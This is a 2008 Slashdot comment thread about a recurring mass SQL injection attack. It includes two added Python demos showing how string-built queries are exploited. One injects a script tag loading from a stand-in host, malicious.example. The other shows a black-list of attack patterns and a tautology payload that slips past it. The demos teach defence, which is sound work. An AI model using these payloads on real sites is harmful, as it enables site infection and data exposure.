
Relentless Web Attack Hard To Kill 218

Posted by kdawson
from the stay-dead-willya dept.
ancientribe writes "The thousands of Web sites infected by a new widespread SQL injection attack during the past few days aren't necessarily in the clear after they remove the malicious code from their sites. Researchers from Kaspersky Lab have witnessed the attackers quickly reinfecting those same sites all over again. Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks."
  • Whatever happened (Score:5, Insightful)

    by RaceProUK (1137575) on Wednesday November 12, 2008 @03:18PM (#25737111) Homepage
    to fixing the hole? It's like fixing a car coolant leak by pouring more water in the radiator.
    • Re: (Score:3, Informative)

      by compro01 (777531)

      AFAICT, they are patching the hole, they're just finding even more holes of the same type.

    • by gurps_npc (621217)
      The problem is, they don't have "a hole", they have swiss cheese. The reason they have swiss cheese is that the people responsible for securing their machines take 3 days to do something that should be done in ten minutes.
  • by sam0737 (648914) <sam@chowch[ ]om ['i.c' in gap]> on Wednesday November 12, 2008 @03:21PM (#25737171)

    At the end of the day it's the problem of plugins...I mean, besides the fact that the website is being infected, it's the flaws and vulnerabilities of the ActiveX/Browser plugins that allow this kind of activity to be profitable.

    Just yet another reason, besides bandwidth, to get Flashblock.

    And install as few as browsers plugins/ActiveX as possible.

  • noscript (Score:5, Informative)

    by Manfre (631065) on Wednesday November 12, 2008 @03:22PM (#25737191) Homepage Journal
    NoScript is one of the best ways to avoid viruses that are distributed from the web.
    • by NorQue (1000887)
      Until someone discovers an exploitable bug in noscript. ;)
    • by Bryansix (761547)
      If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!
    • No, it's not. (Score:4, Informative)

      by Bearhouse (1034238) on Wednesday November 12, 2008 @04:44PM (#25738399)

      You're right to publicise a good product that I also use and recommend. However:

      Most people that get caught by malware don't understand all these arcane details.

      Most people use IE, (no noscript here..) and blindly click 'OK' when they cannot see the porn.

      Bad web sites / pages don't just install viruses.*

    • Trust (Score:2, Insightful)

      by mfh (56)

      Okay keep using Noscript. I don't have a problem with that, but be warned that you are not fully protected by Noscript when the website you TRUST is attacked by an exploit like SQL injection, because YOU TRUST THAT WEBSITE.

      White-lists are better than no-lists, but they aren't perfect.

  • by Anonymous Coward

    SecureWorks: Can I have a copy of your super secret automated tool?

    ChineseUnderground: No...

  • Infected Websites (Score:4, Interesting)

    by sexconker (1179573) on Wednesday November 12, 2008 @03:26PM (#25737297)

    Can someone explain to me how websites get infected?

    Oh, that's right, running ads and other shit from shady people (directly or indirectly).

    I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

    • Just so we're clear, that includes flash and pdf.

    • by corsec67 (627446)

      Oh, that's right, running ads and other shit from shady people (directly or indirectly).

      The article says that the websites are getting hit with a sql injection [wikipedia.org] attack, so ads shouldn't be the problem, unless the ad server is vulnerable.

      This probably has nothing to do with ads and more to do with failing to validate user input. (Obligatory xkcd [xkcd.com] reference)

      • In this case, yes, but see above:

        I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

      • My understanding was that people are passing input as a big string and then turning that into queries instead of doing it the right way, which is passing parameters.

    • by Hatta (162192)

      I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

      I really wish websites would simply stop expecting me to run their code.

  • This disgusts me (Score:4, Insightful)

    by 77Punker (673758) <spencr04@NOSPAM.highpoint.edu> on Wednesday November 12, 2008 @03:28PM (#25737323)

    I develop web applications for a living right now and as someone who's only been in this game for a few months, this disgusts me. I already know how to prevent SQL injection with prepared statements. It's easy to do and requires no extra knowledge, so why doesn't everyone do this?

    • by Rycross (836649) on Wednesday November 12, 2008 @03:33PM (#25737411)

      The problem is a frightening amount of training material on the web uses concatenated SQL strings to teach SQL. Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings. Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

      • by Pope (17780) on Wednesday November 12, 2008 @03:41PM (#25737517)

        I'd say fully half of all the programmers are going to be below average...

      • by corsec67 (627446) on Wednesday November 12, 2008 @03:45PM (#25737569) Homepage Journal

        Throw that in with the fact that roughly half of the programmers reading that are going to be below average

        Um, for anything that is approximately normally distributed, half of the X are going to be below average. (Especially if it is a continuous variable and you use the median)

        • *woosh*
        • If you're going to show off, do it right.

          Many continuous distributions are not normally distributed, and no discrete distributions are. So I don't understand the 'especially if it is a continuous variable' part. Should be 'only if'.

          He said the average, not the median. Sure, for a perfect normal distribution all 3 measures of central tendency are the same - mean, median & mode. Of course, in real life this never happens.

          So the other AC got it right...'fully half if even number' is the only right interpretation.

      • Re: (Score:3, Insightful)

        by CodeBuster (516420)

        Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

        That is what comes of outsourcing and offshoring especially, but there are still managers out there who refuse to acknowledge what I like to call the Iron Law of Software Development or more generally the Project Triangle [wikipedia.org] (good, fast, cheap...pick two).

        • by Rycross (836649)

          Well there are good offshore companies, but when a company off-shores they tend to do so to save money, which means they go for the cheap and crappy companies. Unfortunately, because a lot of these places are a growing market, there tend to be an abundance of the cheap places, who subsequently stock up on poor programmers. The hatchet of the market hasn't had opportunity to trim the fat yet. You'd see a lot of the same stuff going on if you looked at what some companies in the late 90's were producing in

    • by Yetihehe (971185)
      It's very often simple laziness. In the latest project I'm working on I did one function: function q($str). It's even easier to use than prepared statements, it just filters everything not supposed to be there. But why other devs don't always use it is beyond me.
      • by deraj123 (1225722)
        This is really not an appropriate solution. "everything not supposed to be there" relies on knowing what isn't supposed to be there. If you know exactly what's supposed to be there in the first place, why even have dynamic queries? Besides, is concatenating my query in code really easier than defining a query with parameters, and then just copying the parameters from the input form to the query? I've yet to see a filtering function that provides the same level of security as PreparedStatements.
        • by profplump (309017)

          I agree that parameterized statements are the way to go, but in many cases it *is* pretty easy to filter input that shouldn't be present, and using both techniques together can provide protection from things other than SQL injection.

          In many instances you may simply be able to allow only \w or \w\s\.\- without ever destroying valid input. Even if you have wider input requirements it's often possible to drop anything outside the normal printable range and any quoting characters (where "quoting characters" may

          • by deraj123 (1225722)

            Yes, in some cases it is possible. However, I would argue that it is much more likely that you will either miss something that is harmful, or inadvertently place unnecessary restrictions on input.

            I should note that I don't consider parameterized statements to be a replacement for input validation. You should still make sure that your input makes sense for the data it is supposed to represent. However, filtering for "harmful characters" really shouldn't need to be a part of this.
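Added example (not code from the article or from any poster in the thread): the concatenation-versus-parameters point made above, run against SQLite in Python. The content table, the payload and the malicious.example host are constructed for the demonstration. The allow-list at the end is the \w\s\.\- idea from the thread, included as a defence-in-depth check to show both what it stops and what it wrongly rejects.

```python
import re
import sqlite3

# Constructed sample data standing in for a site's content table (not from the article).
PAGES = [
    (1, "Welcome", "<p>Hello, world</p>"),
    (2, "About", "<p>About us</p>"),
]

# Assumed attacker-controlled search value. It closes the open string literal, stacks an
# UPDATE that appends a script tag to every page, then re-opens a literal so the
# application's own trailing quote still parses. The host name is made up for this example.
EVIL_TAG = '<script src="http://malicious.example/x.js"></script>'
PAYLOAD = "x'; UPDATE pages SET body = body || '" + EVIL_TAG + "'; SELECT 'y"


def fresh_db():
    """In-memory SQLite database seeded with the sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", PAGES)
    conn.commit()
    return conn


def search_vulnerable(conn, title):
    """The tutorial pattern: user input concatenated into the SQL text.

    sqlite3's execute() refuses batches, so executescript() is used here to mirror
    drivers that accept several statements per call by default. It discards result
    rows; the point is the side effect the stacked UPDATE has on the table.
    """
    sql = "SELECT id, title, body FROM pages WHERE title = '" + title + "';"
    conn.executescript(sql)
    conn.commit()


def search_safe(conn, title):
    """Parameterised version: the value is bound as data and never parsed as SQL."""
    cur = conn.execute("SELECT id, title, body FROM pages WHERE title = ?", (title,))
    return cur.fetchall()


def infected_pages(conn):
    """How many page bodies now carry a script tag."""
    (n,) = conn.execute("SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'").fetchone()
    return n


# Assumed allow-list in the spirit of the \w\s\.\- suggestion in the thread: a check on
# top of parameters, not a replacement for them.
WELL_FORMED_TITLE = re.compile(r"[\w\s.\-]{1,64}")


def title_is_well_formed(title):
    return WELL_FORMED_TITLE.fullmatch(title) is not None


def demo():
    vuln = fresh_db()
    search_vulnerable(vuln, PAYLOAD)
    safe = fresh_db()
    rows = search_safe(safe, PAYLOAD)
    return {
        "vulnerable_infected": infected_pages(vuln),            # 2: both pages rewritten
        "safe_infected": infected_pages(safe),                  # 0: payload matched no title
        "safe_rows": len(rows),                                 # 0
        "payload_well_formed": title_is_well_formed(PAYLOAD),   # False: allow-list rejects it
        "obrien_well_formed": title_is_well_formed("O'Brien"),  # False: the over-restriction cost
    }


if __name__ == "__main__":
    print(demo())
```

The stacked statement is only one way to abuse a concatenated query; a UNION or a tautology in the WHERE clause needs no batch support at all. The parameterised query is indifferent to all of them, while the allow-list stops the payload but also throws away a perfectly good surname, which is the trade-off deraj123 describes.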

  • Install a proxy (Score:5, Interesting)

    by gfilion (80497) on Wednesday November 12, 2008 @03:35PM (#25737443) Homepage

    We had this problem a few months back at work. Old but necessary asp web sites kept getting infected. It only took a few hours to install a reverse proxy with mod_security on EC2 and we were in the clear.

    Full story on my blog:
    http://guillaume.filion.org/blog/archives/2008/05/i_love_ec2_and_rightscale.php [filion.org]

    • Re:Install a proxy (Score:4, Informative)

      by merreborn (853723) on Wednesday November 12, 2008 @04:56PM (#25738573) Journal

      mod_security is a reactive security measure. It's blacklist based, which makes the classic error of attempting to "enumerate badness" [ranum.com].

      While it's great if you've identified an existing threat to an application you cannot properly secure, it does nothing to protect you against future attacks using less obvious techniques.

      mod_security alone is not an adequate solution. It's still necessary to proactively write secure applications in the first place, which means making sure you're never allowing raw, unfiltered/unescaped user data into places where it shouldn't go.
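Added example, not from the thread and not mod_security's rule set: a toy signature black-list next to an allow-list, to show the "enumerate badness" problem merreborn raises when a filter sits in front of a string-built query. The patterns, the user table and both payloads are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed black-list in the spirit of a signature filter: each entry describes a
# payload somebody has already seen. Illustrative only, not a real WAF rule set.
BAD_PATTERNS = [
    re.compile(r"1\s*=\s*1", re.I),                          # the classic tautology
    re.compile(r"union\s+select", re.I),                     # data extraction
    re.compile(r";\s*(update|insert|delete|drop)\b", re.I),  # stacked statements
    re.compile(r"--"),                                       # comment out the rest
]


def blacklist_blocks(value):
    """True when the signature filter would drop the request."""
    return any(p.search(value) for p in BAD_PATTERNS)


# Assumed allow-list for a username field: state what a valid value looks like and
# reject everything else. No knowledge of attack syntax is needed.
USERNAME = re.compile(r"[A-Za-z0-9_]{1,32}")


def allowlist_accepts(value):
    return USERNAME.fullmatch(value) is not None


def lookup_vulnerable(conn, username):
    """String-built query behind the filter, as in the 'old but necessary' sites above."""
    sql = "SELECT name FROM users WHERE name = '" + username + "' AND active = 1"
    return [row[0] for row in conn.execute(sql)]


def sample_db():
    """Constructed user table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, active INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", 1), ("bob", 1), ("mallory", 0)])
    return conn


KNOWN_PAYLOAD = "' OR 1=1 --"     # matches the signatures
VARIANT_PAYLOAD = "' OR 'x'='x"   # same effect on the query, matches nothing


def demo():
    conn = sample_db()
    return {
        "known_blocked": blacklist_blocks(KNOWN_PAYLOAD),            # True
        "variant_blocked": blacklist_blocks(VARIANT_PAYLOAD),        # False: slipped through
        "variant_result": lookup_vulnerable(conn, VARIANT_PAYLOAD),  # ['alice', 'bob']
        "allowlist_known": allowlist_accepts(KNOWN_PAYLOAD),         # False
        "allowlist_variant": allowlist_accepts(VARIANT_PAYLOAD),     # False
        "allowlist_alice": allowlist_accepts("alice"),               # True
    }


if __name__ == "__main__":
    print(demo())
```

The variant works because AND binds tighter than OR, so the clause reads as name = '' OR ('x'='x' AND active = 1) and every active user comes back. Every new signature added to the black-list only covers the last trick somebody noticed; the allow-list never had to know about either payload.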

  • by Aoet_325 (1396661) on Wednesday November 12, 2008 @03:36PM (#25737453)

    "The toolkit is protected with a layer of digital rights management and appears to be sold mainly in China. "

    this is why I don't believe in "Trusted" computing.
    When software or hardware are used to take control of a computer away from that computer's owner bad things will happen.

    • lol,

      When software or hardware are used to take control of a computer away from that computer's owner bad things will happen.

      ... on an article about viruses. Yes well done, +1 Insightful. Never mind that trusted computing != DRM and that the most common use of TC is for security software, doh.

  • by AragornSonOfArathorn (454526) on Wednesday November 12, 2008 @03:39PM (#25737501)

    Is it like Big Trouble in Little China, with the lightning ninjas and floating eye thing? Did they get Kurt Russell to help?

    If so, that would be AWESOME.

    • by Hatta (162192)

      This Relentless web attack sounds more like a Little Big Adventure to me.

  • by genner (694963) on Wednesday November 12, 2008 @03:53PM (#25737685)
    Did everyone miss the fact that the toolkit responsible includes some hefty DRM?

    Where's the outrage?
    Why aren't we demanding an open source solution?
  • Sure! They can block users from nasty ol' Capitalist porn. But, do they keep users from attacking overseas networks? Noooooo.

    Sorry. I'm in touch with my inner child today.

  • "researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks"

    I wish my job description sounded as exciting as this one.

  • I keep seeing "SQL injection", but injection into what? PHP? ASP? Plesk? Something else? Specific scripts, or the language engine itself?

    • by shawnce (146129)

      "I keep seeing "SQL injection", but injection into what?" ...into anything that will then turn around and execute the tainted SQL query (dynamically generated).

  • McColo? (Score:3, Insightful)

    by Ungrounded Lightning (62228) on Wednesday November 12, 2008 @06:18PM (#25739627) Journal

    I wonder how many of the malicious servers the injected SQL dumped the users into were hosted on McColo - and are thus now not available?

  • Seriously, SQL Injection is one of the simplest attack vectors to prevent. If you can't prevent SQL injection, you should not be allowed to write a web application.
